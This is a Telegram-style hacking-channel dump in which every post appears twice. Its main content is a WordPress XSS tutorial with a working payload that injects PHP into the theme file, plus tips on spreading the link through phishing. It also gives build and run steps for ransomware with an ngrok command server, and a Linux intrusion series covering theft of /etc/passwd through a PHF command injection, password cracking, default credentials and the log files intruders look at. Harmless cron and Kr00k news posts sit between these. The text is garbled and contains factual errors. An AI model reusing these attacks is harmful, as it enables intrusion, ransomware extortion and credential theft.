β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ example for writing the following script in the ROOT CRON of the main server
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
#time sync
0 5 * * 1 (/ usr / bin / rdate -s YOUR_DATE_TIME_SERVER)
#backup gnats
6 3 * * * (cd / home; tar cf
/home/backup/gnats.
cvsroot
5 3 * * * (cd / home; tar cf
/home/backup/cvsroot.
#backup apache
8 3 * * * (cd / home; tar cf
/home/backup/apache.
#gzip all backup
50 3 * * * (gzip -f / home / backup / *. tar)
#webalizer demo
3 5 * * * (/ usr / local / bin / webalizer -c /home/apache/conf/webalizer.conf
/ home / apache / logs / `date -d yesterday +
% w` / access_log)
#remove last week log
3 4 * * * (find / home / apache / logs / -name
access_log -mtime +6 -exec rm -f {};) In
π¦ this way, there will be weekly rotation training in the / home / backup directory 7 backups. Then by setting CRON on the secondary server, use the -m option of wget to mirror the / home / backup directory on the primary server or use rsync to synchronize. The next two are about the log statistics of the server using webalzier, and the logs of APACHE are rotated through cronolog. Please refer to the specific settings
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ example for writing the following script in the ROOT CRON of the main server
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
#time sync
0 5 * * 1 (/ usr / bin / rdate -s YOUR_DATE_TIME_SERVER)
#backup gnats
6 3 * * * (cd / home; tar cf
/home/backup/gnats.
date + \% w.tar gnats) #backupcvsroot
5 3 * * * (cd / home; tar cf
/home/backup/cvsroot.
date + \% w .tar cvsroot)#backup apache
8 3 * * * (cd / home; tar cf
/home/backup/apache.
date + \% w.tar apache)#gzip all backup
50 3 * * * (gzip -f / home / backup / *. tar)
#webalizer demo
3 5 * * * (/ usr / local / bin / webalizer -c /home/apache/conf/webalizer.conf
/ home / apache / logs / `date -d yesterday +
% w` / access_log)
#remove last week log
3 4 * * * (find / home / apache / logs / -name
access_log -mtime +6 -exec rm -f {};) In
π¦ this way, there will be weekly rotation training in the / home / backup directory 7 backups. Then by setting CRON on the secondary server, use the -m option of wget to mirror the / home / backup directory on the primary server or use rsync to synchronize. The next two are about the log statistics of the server using webalzier, and the logs of APACHE are rotated through cronolog. Please refer to the specific settings
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AFTER THOSE TUTORIALS YOU ARE ABLE TO CONFIG ANY APACHE SERVER AND FULL UNDERSTANDING HOW THEY WORKS
E N J O Y @UndercOdeTesting
E N J O Y @UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Wi-Fi vulnerability Kr00k exposure: billions of devices worldwide affected CVE
recently from Underc0de Tweets @UndercOdeTC
1) Wi-Fi chips manufactured by Cypress Semiconductor and Broadcom have serious security vulnerabilities, making billions of devices around the world very vulnerable to hackers, allowing attackers to decrypt the airborne transmissions around him. Sensitive data.
2) The vulnerability was made public during the RSA Security Conference that opened today. For Apple users, this issue has been resolved in the iOS 13.2 and macOS 10.15.1 updates released in late October last year.
3) The security company ESET detailed this vulnerability at the RSA conference. Hackers can use a vulnerability called Kr00k to interrupt and decrypt WiFi network traffic. The vulnerability exists in Wi-Fi chips from Cypress and Broadcom, which are two major brands with high global market shares, which are widely used from laptops to smartphones, from APs to IoT devices.
4) Among them are Amazon Echo and Kindle, Apple's iPhone and iPad, Google's Pixel, Samsung's Galaxy series, Raspberry Pi, Xiaomi, Asus, Huawei and other brand products are used. A conservative estimate is that one billion devices worldwide are affected by the vulnerability.
5) After the hacker successfully exploited this vulnerability, he could intercept and analyze the wireless network data packets sent by the device. Ars Technica stated:
6) Kr00k exploits a vulnerability that occurs when a wireless device disconnects from a wireless access point. If an end-user device or AP hotspot is attacked, it will put all unsent data frames into the send buffer and then send them wirelessly. Instead of using a session key previously negotiated and used during normal connections to encrypt this data, the vulnerable device uses a key consisting of all zeros, which makes decryption impossible.
7) A good thing is that the Kr00k error only affects WiFi connections encrypted using WPA2-Personal or WPA2-Enterprise security protocols and AES-CCMP. This means that if you use Broadcom or Cypress WiFi chipset devices, you can prevent hackers from using the latest WiFi authentication protocol WPA3 to attack.
8) According to ESET Research, which released detailed information about the vulnerability, the vulnerability has been disclosed to Broadcom and Cypress along with potentially affected parties. Currently, device patches for most major manufacturers have been released.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Wi-Fi vulnerability Kr00k exposure: billions of devices worldwide affected CVE
recently from Underc0de Tweets @UndercOdeTC
1) Wi-Fi chips manufactured by Cypress Semiconductor and Broadcom have serious security vulnerabilities, making billions of devices around the world very vulnerable to hackers, allowing attackers to decrypt the airborne transmissions around him. Sensitive data.
2) The vulnerability was made public during the RSA Security Conference that opened today. For Apple users, this issue has been resolved in the iOS 13.2 and macOS 10.15.1 updates released in late October last year.
3) The security company ESET detailed this vulnerability at the RSA conference. Hackers can use a vulnerability called Kr00k to interrupt and decrypt WiFi network traffic. The vulnerability exists in Wi-Fi chips from Cypress and Broadcom, which are two major brands with high global market shares, which are widely used from laptops to smartphones, from APs to IoT devices.
4) Among them are Amazon Echo and Kindle, Apple's iPhone and iPad, Google's Pixel, Samsung's Galaxy series, Raspberry Pi, Xiaomi, Asus, Huawei and other brand products are used. A conservative estimate is that one billion devices worldwide are affected by the vulnerability.
5) After the hacker successfully exploited this vulnerability, he could intercept and analyze the wireless network data packets sent by the device. Ars Technica stated:
6) Kr00k exploits a vulnerability that occurs when a wireless device disconnects from a wireless access point. If an end-user device or AP hotspot is attacked, it will put all unsent data frames into the send buffer and then send them wirelessly. Instead of using a session key previously negotiated and used during normal connections to encrypt this data, the vulnerable device uses a key consisting of all zeros, which makes decryption impossible.
7) A good thing is that the Kr00k error only affects WiFi connections encrypted using WPA2-Personal or WPA2-Enterprise security protocols and AES-CCMP. This means that if you use Broadcom or Cypress WiFi chipset devices, you can prevent hackers from using the latest WiFi authentication protocol WPA3 to attack.
8) According to ESET Research, which released detailed information about the vulnerability, the vulnerability has been disclosed to Broadcom and Cypress along with potentially affected parties. Currently, device patches for most major manufacturers have been released.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ XSS in WordPress: a tutorial Full by UndercOde :
1) One of the most common vulnerabilities in WordPress plugins is cross site scripting β XSS for short. The basic premise of XSS is that an attacker is able to cause JavaScript to run in somebody elseβs browser, while theyβre on a website that the attacker shouldnβt be able to control.
2) By the end of this, youβll have introduced a vulnerability, proven that itβs vulnerable
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Make your site vulnerable
(Tip: Probably best not to do this on a production site)
There are many ways to make your site vulnerable to XSS. But in the interest of brevity, weβll choose the quickest and easiest way to do it. Create a new post on your WordPress site, as an admin user, switch the editor into Text mode, and add this and click publish:
<script>eval(window.location.hash.substring(1))</script>
Congratulations, your site is vulnerable to XSS.
2) Writing a malicious payload
We can do a lot of things. We could create a new user, we could delete all the posts, but today letβs do the worst thing possible and execute arbitrary code on the server.
> By default, WordPress lets you edit theme and plugin files. You absolutely should turn this off. Somebody with malicious intentions can do a lot of damage with it. As weβre about to find outβ¦
3) You can edit the current themeβs functions.php file from /wp-admin/theme-editor.php?file=functions.php
4) Open up your devtools and execute this (no really, donβt do this on your production site!):
nc=document.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()
Ooh, thatβs going to be annoying. We havenβt done too much damage though, so open up functions.php in your text editor and remove the defacement (i.e. replace the first line with <?php).
5) Now we have a proof of concept and a malicious payload we want to execute. We just need to put those pieces together, along with a little extra JavaScript to open that page in an iframe, and weβll have something ready to do some damageβ¦
6) Visit your vulnerable page, and add the following to the end of the URL (you may need to refresh after doing that):
#i=document.createElement('iframe');document.body.appendChild(i);i.src='/wp-admin/theme-editor.php?file=functions.php';window.setTimeout(function(){nc=i.contentDocument.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()},3000)
Now youβve defaced your entire site just by following a link. If you can run arbitrary JavaScript on a WordPress site you can do virtually anything an admin user can do, including (by default) execute arbitrary PHP.
7) Delivery
To deliver your link youβll need to use some social engineering.
Firstly, a URL shortener is handy β a bit.ly link might look suspicious, but less suspicious than a huge URL full of JavaScript.
You could make an email that looks exactly like a Facebook notification. You could even buy a domain name, set it up to redirect to the malicious URL, and rent a billboard outside their office. Get creative.
π¦ exploit that does a bit of damage.
We learnt that if you can run alert(1) then you can probably run any JavaScript.
Weβve also learnt that by default, an XSS vulnerability in WordPress allows attackers to run arbitrary PHP code. This is why XSS in WordPress is particularly dangerous.
π¦Proof of concept
I claimed that your site is vulnerable to XSS, but is it really? Donβt take my word for it, letβs prove it.
Visit the page you just created, and then add #alert(1) to the end of the URL. (You may need to refresh after doing that).
You should see an alert box saying βlocalhost says: 1β or just β1β.
This is called a βproof of conceptβ. Weβve proven that we can control the JavaScript running on this site without being admins.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ XSS in WordPress: a tutorial Full by UndercOde :
1) One of the most common vulnerabilities in WordPress plugins is cross site scripting β XSS for short. The basic premise of XSS is that an attacker is able to cause JavaScript to run in somebody elseβs browser, while theyβre on a website that the attacker shouldnβt be able to control.
2) By the end of this, youβll have introduced a vulnerability, proven that itβs vulnerable
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Make your site vulnerable
(Tip: Probably best not to do this on a production site)
There are many ways to make your site vulnerable to XSS. But in the interest of brevity, weβll choose the quickest and easiest way to do it. Create a new post on your WordPress site, as an admin user, switch the editor into Text mode, and add this and click publish:
<script>eval(window.location.hash.substring(1))</script>
Congratulations, your site is vulnerable to XSS.
2) Writing a malicious payload
We can do a lot of things. We could create a new user, we could delete all the posts, but today letβs do the worst thing possible and execute arbitrary code on the server.
> By default, WordPress lets you edit theme and plugin files. You absolutely should turn this off. Somebody with malicious intentions can do a lot of damage with it. As weβre about to find outβ¦
3) You can edit the current themeβs functions.php file from /wp-admin/theme-editor.php?file=functions.php
4) Open up your devtools and execute this (no really, donβt do this on your production site!):
nc=document.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()
Ooh, thatβs going to be annoying. We havenβt done too much damage though, so open up functions.php in your text editor and remove the defacement (i.e. replace the first line with <?php).
5) Now we have a proof of concept and a malicious payload we want to execute. We just need to put those pieces together, along with a little extra JavaScript to open that page in an iframe, and weβll have something ready to do some damageβ¦
6) Visit your vulnerable page, and add the following to the end of the URL (you may need to refresh after doing that):
#i=document.createElement('iframe');document.body.appendChild(i);i.src='/wp-admin/theme-editor.php?file=functions.php';window.setTimeout(function(){nc=i.contentDocument.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()},3000)
Now youβve defaced your entire site just by following a link. If you can run arbitrary JavaScript on a WordPress site you can do virtually anything an admin user can do, including (by default) execute arbitrary PHP.
7) Delivery
To deliver your link youβll need to use some social engineering.
Firstly, a URL shortener is handy β a bit.ly link might look suspicious, but less suspicious than a huge URL full of JavaScript.
You could make an email that looks exactly like a Facebook notification. You could even buy a domain name, set it up to redirect to the malicious URL, and rent a billboard outside their office. Get creative.
π¦ exploit that does a bit of damage.
We learnt that if you can run alert(1) then you can probably run any JavaScript.
Weβve also learnt that by default, an XSS vulnerability in WordPress allows attackers to run arbitrary PHP code. This is why XSS in WordPress is particularly dangerous.
π¦Proof of concept
I claimed that your site is vulnerable to XSS, but is it really? Donβt take my word for it, letβs prove it.
Visit the page you just created, and then add #alert(1) to the end of the URL. (You may need to refresh after doing that).
You should see an alert box saying βlocalhost says: 1β or just β1β.
This is called a βproof of conceptβ. Weβve proven that we can control the JavaScript running on this site without being admins.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Ransomware Updated Tutorial :
t.me/UndercOdeTesting
π¦ Features :
1)Run in Background (or not)
2) Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
3) RSA-4096 to secure the client/server communication.
4) Includes an Unlocker.
5) Optional TOR Proxy support.
6) Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.
7) Walk all drives by default.
8) Docker image for compilation.
π¦ ππΌππ πππΈβπ :
1) download the project outside your $GOPATH:
2) git clone github.com/mauri870/ransomware
3) cd ransomware
If you have Docker skip to the next section.
4) You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
5) make deps
make
6) You can build the server for windows with make -e GOOS=windows.
π¦ Docker
./build-docker.sh make
Config Parameters
7) You can change some of the configs during compilation. Instead of run only make, you can use the following variables:
HIDDEN='-H windowsgui' # optional. If present the malware will run in background
USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server
SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware
SERVER_PORT=8080 # the server port, if using a domain you can set this to 80
GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
Example:
make -e USE_TOR=true SERVER_HOST=mydomain.com SERVER_PORT=80 GOOS=darwin
The SERVER_ variables above only apply to the malware. The server has a flag --port that you can use to change the port that it will listen on.
DON'T RUN ransomware.exe IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT! I'm not resposible if you acidentally encrypt all of your disks!
π¦How it Works :
1) First of all lets start our external domain:
ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
2) Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
4) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
5) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
If you see a OK and some logs in the server output you are ready to go.
6) Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
Then simply run the ransomware.exe and see the magic happens
π¦ I Post this ransoware tutorial from his git link for learn not for harm
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Ransomware Updated Tutorial :
t.me/UndercOdeTesting
π¦ Features :
1)Run in Background (or not)
2) Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
3) RSA-4096 to secure the client/server communication.
4) Includes an Unlocker.
5) Optional TOR Proxy support.
6) Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.
7) Walk all drives by default.
8) Docker image for compilation.
π¦ ππΌππ πππΈβπ :
1) download the project outside your $GOPATH:
2) git clone github.com/mauri870/ransomware
3) cd ransomware
If you have Docker skip to the next section.
4) You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:
5) make deps
make
6) You can build the server for windows with make -e GOOS=windows.
π¦ Docker
./build-docker.sh make
Config Parameters
7) You can change some of the configs during compilation. Instead of run only make, you can use the following variables:
HIDDEN='-H windowsgui' # optional. If present the malware will run in background
USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server
SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware
SERVER_PORT=8080 # the server port, if using a domain you can set this to 80
GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
Example:
make -e USE_TOR=true SERVER_HOST=mydomain.com SERVER_PORT=80 GOOS=darwin
The SERVER_ variables above only apply to the malware. The server has a flag --port that you can use to change the port that it will listen on.
DON'T RUN ransomware.exe IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT! I'm not resposible if you acidentally encrypt all of your disks!
π¦How it Works :
1) First of all lets start our external domain:
ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
2) Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.
4) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
5) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
If you see a OK and some logs in the server output you are ready to go.
6) Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
Then simply run the ransomware.exe and see the magic happens
π¦ I Post this ransoware tutorial from his git link for learn not for harm
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 1 (plan)
>Crack the password
1) In the UNIX operating system, all system user passwords are stored in a file, this file is stored in the / etc directory, its file name is called passwd.
2) If the reader thinks that the work to be done is to get this file and log in to the system with the above password, then it is very wrong. The psswd file under UNIX and Linux is special.
3) The passwords of all accounts in it have been recompiled (that is, the DES encryption method mentioned earlier), and these passwords are compiled unidirectionally (one -way encrypted), which means there is no way to decompile it.
4) there are programs that can get these raw passwords. The author recommends a cracker program "Cracker Jack", which is also a software that uses a dictionary to exhaust the dictionary files.
5) "Cracker Jack" will compile each value in the dictionary file, and then compare the compiled value with the content in the password file.
6) If the same result is obtained, the corresponding uncompiled password will be reported. This software cleverly bypasses the limitation that passwords cannot be decompiled, and uses exhaustive comparison to obtain passwords. There are many tools for obtaining passwords using this principle, and readers can search on the Internet.
t.me/UndercOdeTesting
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 1 (plan)
>Crack the password
1) In the UNIX operating system, all system user passwords are stored in a file, this file is stored in the / etc directory, its file name is called passwd.
2) If the reader thinks that the work to be done is to get this file and log in to the system with the above password, then it is very wrong. The psswd file under UNIX and Linux is special.
3) The passwords of all accounts in it have been recompiled (that is, the DES encryption method mentioned earlier), and these passwords are compiled unidirectionally (one -way encrypted), which means there is no way to decompile it.
4) there are programs that can get these raw passwords. The author recommends a cracker program "Cracker Jack", which is also a software that uses a dictionary to exhaust the dictionary files.
5) "Cracker Jack" will compile each value in the dictionary file, and then compare the compiled value with the content in the password file.
6) If the same result is obtained, the corresponding uncompiled password will be reported. This software cleverly bypasses the limitation that passwords cannot be decompiled, and uses exhaustive comparison to obtain passwords. There are many tools for obtaining passwords using this principle, and readers can search on the Internet.
t.me/UndercOdeTesting
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 2 starting attack :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) getting the password file
is the most difficult part. Obviously, if the administrator has such a password file, he will certainly not put it there for others to get it comfortably.
> can use john the ripper gd as well see next tutorial how to use it
2) The intruder must find a good way to get the password file without entering the system. Here the author introduces two methods to you, you can try, it may succeed.
> 1.tc directory will not be locked on the FTP service. Intrusion can use the FTP client program to log in with an anonymously anonymous account, and then check if / etc / passwd is set to be read anonymously.
3) If there is a backup, use it immediately. Software decoding.
4) On some systems, there will be a file called PHF in the / cgi-bin directory. It will be more convenient if it is available on the server to be hacked. Because PHF allows users to remotely read files in the website system, based on this, users can use a browser to grab the psswd file, just type the URL in the browser address bar: http://xxx. xxx .xxx / cgi-bin / phf? Qalias = x% 0a / bin / cat% 20 / etc / passwd , where xxx.xxx.xxx is the name of the website to be hacked.
5) If neither of these methods work, the intruder must implement other methods.
> In some cases, the second part of the password file found by the intruder is X,!, Or *, then the password file is locked, which is one of the methods used by system administrators to strengthen security.
6) However, it is rare that the password file is completely hidden. Under normal circumstances, an unlocked password file is backed up in the system, so that intruders can use it.
> For example: the intruder usually looks for the / etc / shadow directory or a similar directory to see if a backup of the password file can be found .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Detailed hack into LINUX server-part 2 starting attack :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) getting the password file
is the most difficult part. Obviously, if the administrator has such a password file, he will certainly not put it there for others to get it comfortably.
> can use john the ripper gd as well see next tutorial how to use it
2) The intruder must find a good way to get the password file without entering the system. Here the author introduces two methods to you, you can try, it may succeed.
> 1.tc directory will not be locked on the FTP service. Intrusion can use the FTP client program to log in with an anonymously anonymous account, and then check if / etc / passwd is set to be read anonymously.
3) If there is a backup, use it immediately. Software decoding.
4) On some systems, there will be a file called PHF in the / cgi-bin directory. It will be more convenient if it is available on the server to be hacked. Because PHF allows users to remotely read files in the website system, based on this, users can use a browser to grab the psswd file, just type the URL in the browser address bar: http://xxx. xxx .xxx / cgi-bin / phf? Qalias = x% 0a / bin / cat% 20 / etc / passwd , where xxx.xxx.xxx is the name of the website to be hacked.
5) If neither of these methods work, the intruder must implement other methods.
> In some cases, the second part of the password file found by the intruder is X,!, Or *, then the password file is locked, which is one of the methods used by system administrators to strengthen security.
6) However, it is rare that the password file is completely hidden. Under normal circumstances, an unlocked password file is backed up in the system, so that intruders can use it.
> For example: the intruder usually looks for the / etc / shadow directory or a similar directory to see if a backup of the password file can be found .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Let s hack the linux server part 3:(after cracking the login pass)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Let s establish our own shell account
After two, three or two key steps, the intruder finally got the key password file, and cracked the password. Now you can run the TELNET program and log in to the host.
2) When connected to the server, the server will show you some information, usually U NIX, linux, aix, irix, ultrix, bsd or even DOS and VAX / Vms; then the Login prompt appears on the screen, then type You can log in to the system with the obtained account and password. At this point, the intruder can use his UNIX knowledge to do what he likes to do.
3) Finally, do an analysis of a password file, the file content is as follows:
root: 1234aaab: 0: 1: Operator: /: / bin / csh
nobody: *: 12345: 12345 :: /:
daemon: *: 1: 1: : /:
sys: *: 2: 2 :: /: / bin / csh
sun: 123456hhh: 0: 1: Operator: /: / bin / csh
bin: *: 3: 3 :: / bin:
uucp: *: 4: 8 :: / var / spool / uucppublic:
news: *: 6: 6 :: / var / spool / news: / bin / csh
audit: *: 9: 9 :: / etc / security / audit: / bin / csh
sync :: 1: 1 :: /: / bin / sync
sysdiag: *: 0: 1: Old System
Diagnostic: / usr / diag / sysdiag: / usr / diag / sysdiag / sysdiag
sundiag: *: 0: 1: System
Diagnostic: / usr / diag / sundiag: / usr / diag / sundiag / sundiag
tom: 456lll45uu: 100: 20 :: / home / tom : / bin / csh
john: 456fff76Sl: 101: 20: john: / home / john: / bin / csh
henry: AusTs45Yus: 102: 20: henry: / home / henry: / bin / csh
harry: SyduSrd5sY: 103: 20 : Harry: / Home / Harry: / bin / csh
Steven: GEs45Yds5Ry: 104: 20 is: Steven: / Home / Steven: / bin / csh
+ :: 0: 0 :::
4) wherein the ":" field is divided into several For example: tom: 456lll45uu: 100: 20: tomchang: / home / tom: / bin / csh The meaning is:
User Name: tom
Password: 456lll45uu
User No: 100
Group No: 20
Real Name: tom chang
Home Dir: / home / tom
Shell: / bin / csh
5) Readers can find the above password fields such as nobody, daemon, sys, bin, uucp, news, audit, sysdiag, sundiag, etc. Yes *, which means that the passwords of these accounts are locked and cannot be used directly.
6) It is worth noting that many systems will have some default accounts and passwords after the first installation, which is convenient for speculative hackers. Here are some default accounts and passwords under UNIX.
ACCOUNT PASSWORD
----------- ----------------
root root
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot for "command login" use
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon
7) where root mountfsys umountfsys install (sometimes also sync) is a root-level account, that is, it has sysop (system administrator) permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Let s hack the linux server part 3:(after cracking the login pass)
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Let s establish our own shell account
After two, three or two key steps, the intruder finally got the key password file, and cracked the password. Now you can run the TELNET program and log in to the host.
2) When connected to the server, the server will show you some information, usually U NIX, linux, aix, irix, ultrix, bsd or even DOS and VAX / Vms; then the Login prompt appears on the screen, then type You can log in to the system with the obtained account and password. At this point, the intruder can use his UNIX knowledge to do what he likes to do.
3) Finally, do an analysis of a password file, the file content is as follows:
root: 1234aaab: 0: 1: Operator: /: / bin / csh
nobody: *: 12345: 12345 :: /:
daemon: *: 1: 1: : /:
sys: *: 2: 2 :: /: / bin / csh
sun: 123456hhh: 0: 1: Operator: /: / bin / csh
bin: *: 3: 3 :: / bin:
uucp: *: 4: 8 :: / var / spool / uucppublic:
news: *: 6: 6 :: / var / spool / news: / bin / csh
audit: *: 9: 9 :: / etc / security / audit: / bin / csh
sync :: 1: 1 :: /: / bin / sync
sysdiag: *: 0: 1: Old System
Diagnostic: / usr / diag / sysdiag: / usr / diag / sysdiag / sysdiag
sundiag: *: 0: 1: System
Diagnostic: / usr / diag / sundiag: / usr / diag / sundiag / sundiag
tom: 456lll45uu: 100: 20 :: / home / tom : / bin / csh
john: 456fff76Sl: 101: 20: john: / home / john: / bin / csh
henry: AusTs45Yus: 102: 20: henry: / home / henry: / bin / csh
harry: SyduSrd5sY: 103: 20 : Harry: / Home / Harry: / bin / csh
Steven: GEs45Yds5Ry: 104: 20 is: Steven: / Home / Steven: / bin / csh
+ :: 0: 0 :::
4) wherein the ":" field is divided into several For example: tom: 456lll45uu: 100: 20: tomchang: / home / tom: / bin / csh The meaning is:
User Name: tom
Password: 456lll45uu
User No: 100
Group No: 20
Real Name: tom chang
Home Dir: / home / tom
Shell: / bin / csh
5) Readers can find the above password fields such as nobody, daemon, sys, bin, uucp, news, audit, sysdiag, sundiag, etc. Yes *, which means that the passwords of these accounts are locked and cannot be used directly.
6) It is worth noting that many systems will have some default accounts and passwords after the first installation, which is convenient for speculative hackers. Here are some default accounts and passwords under UNIX.
ACCOUNT PASSWORD
----------- ----------------
root root
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot for "command login" use
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon
7) where root mountfsys umountfsys install (sometimes also sync) is a root-level account, that is, it has sysop (system administrator) permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now After Cracking A linux server wanna analyse The log file :
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) it is necessary to introduce the UNIX log files. Many intruders don't want hacked computers to track them, how do they do that.
2) The system administrator mainly relies on the system's LOG, which is often called the log file, to obtain the traces of the intrusion and the IP and other information of the intruder. Of course, some administrators use third-party tools to record information about intruding into a computer. Here we mainly talk about files that record intrusion traces in general U NIX systems.
3) There are several versions of UNIX systems, each system has different LOG files, but most should have about the same storage location, the most common location is the following several:
/ usr / adm, earlier versions of UNIX;
/ var / adm, newer versions use this location;
/ var / log, some versions of Solaris, Linux BSD, Free BSD use this location;
/ etc, most UNIX versions put utmp here, some also put wtmp here This is also the location of syslog.conf.
4) The functions of some files are listed below, of course, they also differ according to different invaded systems.
> acct or pacct, which records the command records used by each user;
access_log, which is mainly used to run NCSA HTTPD on the server, what sites in this log file will connect to your server
aculog, which holds the MODEMS record you dialed out;
lastlog, which records the user's recent login record and the initial destination of each user, sometimes the last unsuccessful login;
loginlog, which records some abnormal login records;
messages , Record the output output to the system console, and other information is generated by syslog;
security, record some cases of using the UUCP system to attempt to enter the restricted range;
>sulog, record the record using the su command;
utmp, record the current login to the system For all users, this file changes constantly as the user enters and leaves the system;
utmpx, an extension of UTMP;
wtmp, records user login and logout events;
syslog, the most important log file, is obtained using the syslogd daemon.
π¦ Log information:
1) / dev / log, a UNIX domain socket that accepts messages generated by processes running on the local machine;
2) / dev / klog, a device that receives messages from the UNIX kernel;
port 514, an Internet socket , Accepting syslog messages generated by other machines via UDP;
3) Uucp, the recorded UUCP information, can be updated by local UUCP activities, and can also be modified by actions initiated by remote sites. The information includes calls made and accepted, requests made, sender , Sending time and sending host;
4) lpd-errs, a log that handles printer fault information;
ftp log, you can obtain the recording function by executing ftpd with the -l option;
httpd log, HTTPD server records each web access record in the log;
History log, this file keeps a record of the user's recent input commands;
vold.log, records errors encountered when using external media.
5) The above introduces the main steps of hacking the server, and the reader should now have some basic knowledge about it. It needs to be emphasized again that if the reader lacks knowledge of the UNIX system, it is absolutely impossible to master it.
Written by UndercOde
